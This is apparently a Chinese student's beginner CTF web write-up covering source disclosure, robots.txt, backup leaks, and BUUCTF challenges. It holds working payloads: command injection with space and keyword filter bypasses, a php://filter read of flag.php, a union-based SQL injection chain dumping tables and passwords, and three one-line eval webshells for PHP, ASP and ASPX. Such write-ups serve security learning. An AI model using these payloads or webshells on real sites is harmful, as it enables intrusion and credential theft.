web入门

无法查看源代码

这个我f12看不了，用Ctrl+u

robots

提示robots.txt，就在网站后边加上/robots.txt看看有没有，然后在查看flagishere.txt

phps文件泄露

在网站后面加/index.phps就可以下载网站的php源代码文件,打开即可。

解压源代码到当前目录

加/WWW.zip 或者/www.zip

[ACTF2020 新生赛]Include

输入127.0.0.1|ls / 看根目录
输入127.0.0.1|cat /flag看flag

[极客大挑战 2019]Secret File

感谢大佬博客
点进网站，看源代码

那就在网站后面加个/Archive_room.php

查看源代码

在网站后面加/action.php(把上一步的删掉)

可以看到网站闪的很快，这时候我们就要用BurpSuite抓
返回有secret的页面，Foxy改下

然后这里改好

点secret，网页转圈，BurpSuite有东西出现了
当action.php出现的时候

右键发送到repeater

然后点repeater再点send

可以看到response这里出现了个 secr3t.php

返回网址，在后面加/ secr3t.php

然后是php伪协议，在网址后面加?file=php://filter/read=convert.base64-encode/resource=flag.php

解一下码就是flag了

[GXYCTF 2019]Ping Ping Ping

先在网址后边加上/?ip=127.0.0.1

成功了，可以用;执行语句了，先用ls查看列表


尝试直接cat flag.php

那就说明需要绕过什么东西去cat它
可以使用$IFS$9绕过空格
?ip=127.0.0.1;cat$IFS$9index.php

成功了，然后还得绕过，可以用变量拼接的方法来绕过flag这个关键字。
让变量a=ag，让变量b=fl
?ip=127.0.0.1;a=ag;b=fl;cat$IFS$9$b$a.php
查看源代码就可以看到flag了

码个讲了挺多绕过方法的大佬博客

[极客大挑战 2019]LoveSQL

万能密码登录用户名：1' or 1=1# 密码：123（随便输）

查看源代码发现正确的用户名和密码

那个密码尝试md5碰撞，失败
查询字段数
check.php?username=admin' order by 4%23&password=1
试到4的时候报错了

可知共3个字段。用union查询测试注入点（回显点位）check.php?username=1' union select 1,2,3%23&password=1

得到回显点位为2和3，查询当前数据库名及版本check.php?username=1' union select 1,database(),version()%23&password=1

可知当前数据库为geek，接下来，爆表
/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

爆出这两个表，我们试一下l0ve1ysq1这个表，爆字段
/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

爆数据
/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1
得到flag

来自小白的感悟：这一套连招好丝滑但是真的能靠脑子记下来吗=-=

[极客大挑战 2019]Knife

做这道题之前要了解一下webshell和木马

三种一句话木马
php<?php @eval($_POST['x'];?)>
asp<%eval request ("x")%>
aspx<%@ Page Language="Jscript"%> <%eval(Request.Item["x"],"unsafe");%>
然后用中国菜刀或者蚁剑就能弄出来了